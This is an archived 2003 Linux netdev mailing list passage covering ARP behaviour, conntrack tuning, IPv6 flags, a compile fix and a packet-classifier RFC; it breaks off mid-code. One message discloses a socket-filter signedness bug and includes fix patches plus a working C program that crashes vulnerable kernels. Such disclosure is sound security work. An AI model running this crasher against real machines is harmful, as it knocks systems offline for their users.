From carlosev@newipnet.com Thu Jul 24 12:11:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 12:11:07 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OJAwFl026028 for ; Thu, 24 Jul 2003 12:10:59 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9916320775; Thu, 24 Jul 2003 21:10:57 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 57C64207B3; Thu, 24 Jul 2003 21:10:47 +0200 (CEST) Message-ID: <200307242054550080.00E3F4FF@192.168.128.16> In-Reply-To: <20030724113731.73e9bbf6.davem@redhat.com> References: <200307241836060226.006FACEB@192.168.128.16> <200307242011420101.00BC642D@192.168.128.16> <20030724113731.73e9bbf6.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 20:54:55 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OJAwFl026028 X-archive-position: 4296 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 11:37 David S. Miller wrote: >> Question: _What would be the implications of applying my patch or >similar to do linux behave like other OS? > >You'll break things for people who depend upon the >way Linux currently behaves. Well, really the question is: What are these situations exactly? IMHO... the patch is only changing the src ip address for arp requests on a few situations. 
Regards, Carlos Velasco From laforge@netfilter.org Thu Jul 24 13:13:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 13:13:30 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OKDJFl002725 for ; Thu, 24 Jul 2003 13:13:21 -0700 Received: from uucp by coruscant.gnumonks.org with local-bsmtp (Exim 4.20) id 19fmSj-0001pD-Ti for netdev@oss.sgi.com; Thu, 24 Jul 2003 22:13:17 +0200 Received: from laforge by naboo.gnumonks.org with local (Exim 3.36 #1) id 19fiWq-0002w6-00; Thu, 24 Jul 2003 18:01:16 +0200 Date: Thu, 24 Jul 2003 18:01:16 +0200 From: Harald Welte To: Carlos Carvalho Cc: netdev@oss.sgi.com Subject: Re: Memory usage for ip_conntrack Message-ID: <20030724160107.GC10897@naboo> References: <1058563690.26030.23.camel@tux.rsn.bth.se> <16153.56832.379224.202834@fisica.ufpr.br> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="IpbVkmxF4tDyP/Kb" Content-Disposition: inline In-Reply-To: <16153.56832.379224.202834@fisica.ufpr.br> X-Operating-System: Linux naboo 2.4.20-nfpom1101 X-Date: Today is Prickle-Prickle, the 58th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4297 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --IpbVkmxF4tDyP/Kb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Jul 19, 2003 at 09:10:40PM -0300, Carlos Carvalho wrote: > Martin Josefsson (gandalf@wlug.westbo.se) wrote on 18 July 2003 23:28: > >> If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst > >> case memory usage? > > > >Don't do this. This will increase the maximum number of connections it > >will track, but not the number of buckets.
Which means that it will be > >slower due to longer collision-chains. Instead increase the number of > >buckets. modprobe ip_conntrack hashsize=131072 (or any number here. > > How can we increase the number of buckets with a monolithic kernel? For 2.4: by altering the default in the kernel source, sorry. For 2.5/2.6: there is now a generic way of specifying module parameters from the boot command line. -- - Harald Welte http://www.netfilter.org/ ============================================================================ "Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed." -- Paul Vixie --IpbVkmxF4tDyP/Kb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE/IALBXaXGVTD0i/8RAh2DAJ9qobKhgY2vjygWm/0rcGyOkFFkHACgl//g AL7lgAvRyJXOnotlqbED8Qw= =cw1n -----END PGP SIGNATURE----- --IpbVkmxF4tDyP/Kb-- From krkumar@us.ibm.com Thu Jul 24 17:15:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 17:15:37 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6P0FGFl023041 for ; Thu, 24 Jul 2003 17:15:28 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6P0EF4X220950; Thu, 24 Jul 2003 20:14:15 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6P0ECPT222384; Thu, 24 Jul 2003 20:14:13 -0400 Message-ID: <3F20766C.3060400@us.ibm.com> Date: Thu, 24 Jul 2003 17:14:36 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US;
rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 References: <200307241443.SAA09525@dub.inr.ac.ru> In-Reply-To: <200307241443.SAA09525@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4298 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev So people are ok with using struct ? Since it can be typecast as an array :-) thanks, - KK kuznet@ms2.inr.ac.ru wrote: > Hello! > > >>I'm not so sure about the "array," but anyway, >>I don't think it is so ugly to use struct / offsetof. > > > Just write a sample of code, printing all fields of struct > and equivalent array, and you will see. > > Well, I just know, that when iproute will do this, it will > cast the struct to array in any case. It is dirty, but sane at least. :-) > > Alexey > From davem@redhat.com Fri Jul 25 06:26:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 06:26:14 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PDQ0Fl023242 for ; Fri, 25 Jul 2003 06:26:03 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA15064; Fri, 25 Jul 2003 06:22:41 -0700 Date: Fri, 25 Jul 2003 06:22:41 -0700 From: "David S. 
Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030725062241.2df3e700.davem@redhat.com> In-Reply-To: <3F20766C.3060400@us.ibm.com> References: <200307241443.SAA09525@dub.inr.ac.ru> <3F20766C.3060400@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4299 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 17:14:36 -0700 Krishna Kumar wrote: > So people are ok with using struct ? Since it can be typecast as an array :-) I think something more like route metrics, ie. an array, is more appropriate and that Alexey is right about this. From kaber@trash.net Fri Jul 25 11:19:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:19:45 -0700 (PDT) Received: from gw.localnet (port-212-202-53-133.reverse.qsc.de [212.202.53.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIJZFl007685 for ; Fri, 25 Jul 2003 11:19:38 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19g791-0005Cn-00; Fri, 25 Jul 2003 20:18:19 +0200 Message-ID: <3F2174E6.7060700@trash.net> Date: Fri, 25 Jul 2003 20:20:22 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.4-2 X-Accept-Language: en MIME-Version: 1.0 To: netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Local dos in linux socket filters Content-Type: multipart/mixed; boundary="------------030305030001080202030804" X-archive-position: 4300 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev 
This is a multi-part message in MIME format. --------------030305030001080202030804 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Dave Miller asked me to post this so it is public: The Linux Socket Filter implementation contains a bug which can lead to a local dos. Due to a unsigned->signed conversion and insufficient bounds checking it is possible to crash the kernel by accessing unmapped memory. The bug was introduced during the attempt to fix other signedness issues in 2.4.3-pre3. The attached two patches for 2.4 and 2.6 fix the problem (already in davem's tree). Also attached is a program to crash your kernel. Bye, Patrick --------------030305030001080202030804 Content-Type: text/plain; name="linux-2.4-sock_filter-dos.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.4-sock_filter-dos.diff" ===== filter.c 1.3 vs edited ===== --- 1.3/net/core/filter.c Tue Feb 5 08:40:16 2002 +++ edited/filter.c Fri Jul 25 02:16:30 2003 @@ -294,10 +294,9 @@ goto load_b; case BPF_LDX|BPF_B|BPF_MSH: - k = fentry->k; - if(k >= 0 && (unsigned int)k >= len) + if(fentry->k >= len) return (0); - X = (data[k] & 0xf) << 2; + X = (data[fentry->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: --------------030305030001080202030804 Content-Type: text/plain; name="linux-2.6-sock_filter-dos.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.6-sock_filter-dos.diff" ===== net/core/filter.c 1.6 vs edited ===== --- 1.6/net/core/filter.c Thu Jun 5 02:57:08 2003 +++ edited/net/core/filter.c Fri Jul 25 02:35:07 2003 @@ -256,10 +256,9 @@ k = X + fentry->k; goto load_b; case BPF_LDX|BPF_B|BPF_MSH: - k = fentry->k; - if (k >= 0 && (unsigned int)k >= len) + if (fentry->k >= len) return 0; - X = (data[k] & 0xf) << 2; + X = (data[fentry->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: A = fentry->k; --------------030305030001080202030804 Content-Type: text/x-csrc; name="socketfilter.c" 
Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="socketfilter.c" #include #include #include #include #include int main(int argc, char **argv) { struct sockaddr_in sin; struct bpf_program bp; struct bpf_insn buf[10]; char rcvbuf[2000]; int i = 0; int fd; fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (fd < 0) { perror("socket"); exit(1); } memset(buf, 0, sizeof(buf)); buf[i].code = BPF_LDX|BPF_B|BPF_MSH; buf[i].k = (1<<31) + (1<<29); i++; buf[i].code = BPF_RET; i++; bp.bf_len = i; bp.bf_insns = buf; if (setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &bp, sizeof(bp)) < 0) { perror("setsockopt"); exit(1); } sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; sin.sin_port = htons(10000); if (bind(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("bind"); exit(1); } if (recvfrom(fd, rcvbuf, sizeof(rcvbuf), 0, NULL, 0) < 0) { perror("recvfrom"); exit(1); } } --------------030305030001080202030804-- From carlosev@newipnet.com Fri Jul 25 11:47:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:47:42 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIlZFl009561 for ; Fri, 25 Jul 2003 11:47:37 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id DE4F3207A0; Fri, 25 Jul 2003 20:47:33 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id E3E1E20775; Fri, 25 Jul 2003 20:47:18 +0200 (CEST) Message-ID: <200307252024190066.051F80CE@192.168.128.16> In-Reply-To: <20030724091007.68923845.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 20:24:19 +0200 From: "Carlos Velasco" To: "David S. Miller" , "Julian Anastasov" Cc: bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? 
ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6PIlZFl009561 X-archive-position: 4301 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 9:10 David S. Miller wrote: >The hidden patch is not necessary with current kernels and arpfilter. arp_filter doesn't work. If I'm not wrong it's applied when you have two or more interfaces in the same subnet. This is not the case. I have applied hidden patch and it works. If I'm not wrong, the hidden patch makes linux behave like other OS, separating selected interfaces of another interfaces. It does not break anything because it's all configurable in /proc. Maybe it would be good including it in the kernel package? Regards, Carlos Velasco From davem@redhat.com Fri Jul 25 11:49:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:49:27 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PInMFl009951 for ; Fri, 25 Jul 2003 11:49:23 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA15961; Fri, 25 Jul 2003 11:46:35 -0700 Date: Fri, 25 Jul 2003 11:46:34 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? 
ARP with wrong src IP address Message-Id: <20030725114634.73dc9e8d.davem@redhat.com> In-Reply-To: <200307252024190066.051F80CE@192.168.128.16> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4302 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 20:24:19 +0200 "Carlos Velasco" wrote: > On 24/07/2003 at 9:10 David S. Miller wrote: > > >The hidden patch is not necessary with current kernels and arpfilter. > > arp_filter doesn't work. This is impossible, hidden is a subset of what arpfilter can do. arpfilter is a netfilter module that can block ARP packets at any point in the networking stack, at your choosing. 
From carlosev@newipnet.com Fri Jul 25 11:59:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:59:23 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIxHFl010777 for ; Fri, 25 Jul 2003 11:59:18 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9BB3220775; Fri, 25 Jul 2003 20:59:15 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 0F6E6207A0; Fri, 25 Jul 2003 20:59:05 +0200 (CEST) Message-ID: <200307252036050292.052A4780@192.168.128.16> In-Reply-To: <20030725114634.73dc9e8d.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 20:36:05 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Content-Type: text/plain; charset="us-ascii" X-archive-position: 4303 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 25/07/2003 at 11:46 David S. Miller wrote: >This is impossible, hidden is a subset of what arpfilter can do. > >arpfilter is a netfilter module that can block ARP packets >at any point in the networking stack, at your choosing. Maybe I'm looking in the wrong place. I have tried with this setting in /proc: === arp_filter - BOOLEAN 1 - Allows you to have multiple network interfaces on the same subnet, and have the ARPs for each interface be answered based on whether or not the kernel would route a packet from the ARP'd IP out that interface (therefore you must use source based routing for this to work). 
In other words it allows control of which cards (usually 1) will respond to an arp request. === Should I need any user space program to configure it or so? Regards, Carlos Velasco From davem@redhat.com Fri Jul 25 12:01:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 12:01:53 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PJ1nFl011252 for ; Fri, 25 Jul 2003 12:01:49 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA16008; Fri, 25 Jul 2003 11:59:02 -0700 Date: Fri, 25 Jul 2003 11:59:02 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030725115902.1d2f61b2.davem@redhat.com> In-Reply-To: <200307252036050292.052A4780@192.168.128.16> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> <200307252036050292.052A4780@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4304 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 20:36:05 +0200 "Carlos Velasco" wrote: > On 25/07/2003 at 11:46 David S. Miller wrote: > > >This is impossible, hidden is a subset of what arpfilter can do. > > > >arpfilter is a netfilter module that can block ARP packets > >at any point in the networking stack, at your choosing. > > Maybe I'm looking in the wrong place. You are, I'm not talking about the sysconfig setting. 
I'm talking about a netfilter module, and yes it does require a tool for configuration which Bart DeSchuym has written, he posted a link to his work earlier in these threads. From carlosev@newipnet.com Fri Jul 25 12:47:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 12:47:14 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PJl5Fl018839 for ; Fri, 25 Jul 2003 12:47:07 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 60659207B5; Fri, 25 Jul 2003 21:46:57 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4E43E20775; Fri, 25 Jul 2003 21:46:46 +0200 (CEST) Message-ID: <200307252123460606.0555F082@192.168.128.16> In-Reply-To: <20030725115902.1d2f61b2.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> <200307252036050292.052A4780@192.168.128.16> <20030725115902.1d2f61b2.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 21:23:46 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6PJl5Fl018839 X-archive-position: 4305 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 25/07/2003 at 11:59 David S. Miller wrote: >I'm talking about a netfilter module, and yes it does require >a tool for configuration which Bart DeSchuym has written, he >posted a link to his work earlier in these threads. 
Well, I consider the hiding patch to be a simpler and better approach to this strange behaviour in Linux (compared to other OS and systems) than needing to include and compile netfilter in the kernel. However I will take a look at it. I have searched and found that this is not the first time that this discussion has come up: http://www.ussg.iu.edu/hypermail/linux/kernel/0212.0/1128.html I agree 100% with this: === I still don't see why an address that is -=ASSIGNED TO AN INTERFACE=- should be responded to on a completely different interface... if we wanted the ip address to be assigned to the system, there should be a pseudo interface that will work on any of the interfaces attached. Why assign an address to an interface if it would work just the same if you assigned it to the loopback adapter? Why would you assign an address to the loopback adapter if you wanted it to be accessed from the world? === Is "hiding" incompatible with any other feature? Regards, Carlos Velasco From shemminger@osdl.org Fri Jul 25 13:36:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 13:37:00 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PKasFl022470 for ; Fri, 25 Jul 2003 13:36:55 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6PKacI18686; Fri, 25 Jul 2003 13:36:39 -0700 Date: Fri, 25 Jul 2003 13:36:38 -0700 From: Stephen Hemminger To: "David S.
Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] compile failure with out proc fs Message-Id: <20030725133638.168de3c3.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4306 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Resolve compile error when CONFIG_IP_MULTICAST && !CONFIG_PROC_FS diff -Nru a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c --- a/net/ipv4/ip_output.c Fri Jul 25 12:31:11 2003 +++ b/net/ipv4/ip_output.c Fri Jul 25 12:31:11 2003 @@ -1313,7 +1313,7 @@ ip_rt_init(); inet_initpeers(); -#ifdef CONFIG_IP_MULTICAST +#if defined(CONFIG_IP_MULTICAST) && defined(CONFIG_PROC_FS) igmp_mc_proc_init(); #endif } From davem@redhat.com Fri Jul 25 13:45:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 13:45:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PKixFl023327 for ; Fri, 25 Jul 2003 13:45:00 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA16263; Fri, 25 Jul 2003 13:42:19 -0700 Date: Fri, 25 Jul 2003 13:42:19 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] compile failure with out proc fs Message-Id: <20030725134219.77bb8823.davem@redhat.com> In-Reply-To: <20030725133638.168de3c3.shemminger@osdl.org> References: <20030725133638.168de3c3.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4307 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 13:36:38 -0700 Stephen Hemminger wrote: > Resolve compile error when CONFIG_IP_MULTICAST && !CONFIG_PROC_FS Applied, thanks. From tgr@reeler.org Sat Jul 26 16:00:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 26 Jul 2003 16:00:56 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6QN0MFl008501 for ; Sat, 26 Jul 2003 16:00:39 -0700 Received: by reeler.org id 19gY0m-0006NP-00 for ; Sun, 27 Jul 2003 00:59:36 +0200 Date: Sun, 27 Jul 2003 00:59:29 +0200 From: Thomas Graf To: netdev@oss.sgi.com Subject: [RFC] Extended Generic Packet Classifier Message-ID: <20030726225929.GF19908@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-archive-position: 4308 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello I'd be glad to hear your thoughts about this. The following is a short summary of: http://tgr.kaosu.ch/egp/concept.ps The Extended Generic Packet Classifier (EGP) is something like an extended U32 classifier. An EGP filter consists of 1..n keys which can be chained together using logic AND and OR operators. 
A key can also be a container for 1..n subkeys: key1 AND ( key2 OR key3 )

A key can match data with the operators equal, not-equal, greater-than, and less-than on 8, 16, and 32 bit pieces of a packet. An offset (the position inside the packet that selects the bits to be matched) consists of multiple offset elements, each either constant or dynamic (see below), which are combined with one of { + | - | * }

A dynamic offset element uses bits of the packet such as IHL. A bitmask and shift operator can be applied to all bits from the packet used for calculation.

Examples (Using reference implementation)

Matches TCP packets to port 22:
egp match u8 eq 6 at 9 and u16 eq 22 at u8 mask 0xf at 0 * 4 + 2

Matches TCP/UDP packets originating from 192.168.23.3:
egp match u32 eq 0xc0a81703 at 12 and ( u8 eq 6 at 9 or u8 eq 17 at 9 )

Matches TCP packets to 192.168.23.3 or UDP packets to 192.168.23.12:
egp match ( u8 eq 6 at 9 and u32 eq 0xc0a81703 at 16 ) \
 or ( u8 eq 17 at 9 and u32 eq 0xc0a8170c at 16 )

Reference implementation: Patch against 2.6.0-test1 and iproute2 can be found at: http://tgr.kaosu.ch/egp/

NOTE: The implementation is done in a straightforward way and is not fully tested. I did the project out of personal interest, but I'm willing to work on it further if there is interest.
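To make the dynamic offset in the first example concrete, here is a minimal user-space sketch in C of how "u8 eq 6 at 9 and u16 eq 22 at u8 mask 0xf at 0 * 4 + 2" could be evaluated against a raw IPv4 packet. It is not taken from the EGP patch: the helper names (egp_u8_at, egp_u16_at, egp_match_tcp_dport22) are hypothetical, and it assumes the offset elements are combined strictly left to right, so the offset is (IHL * 4) + 2.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helpers for illustration only; not part of the EGP patch. */

/* Read an 8-bit value at `off`, or return -1 if it lies outside the packet. */
static int egp_u8_at(const uint8_t *pkt, size_t len, size_t off)
{
    if (off >= len)
        return -1;
    return pkt[off];
}

/* Read a big-endian 16-bit value at `off`, or return -1 if out of bounds. */
static long egp_u16_at(const uint8_t *pkt, size_t len, size_t off)
{
    if (len < 2 || off > len - 2)
        return -1;
    return ((long)pkt[off] << 8) | pkt[off + 1];
}

/*
 * Evaluate: u8 eq 6 at 9 and u16 eq 22 at u8 mask 0xf at 0 * 4 + 2
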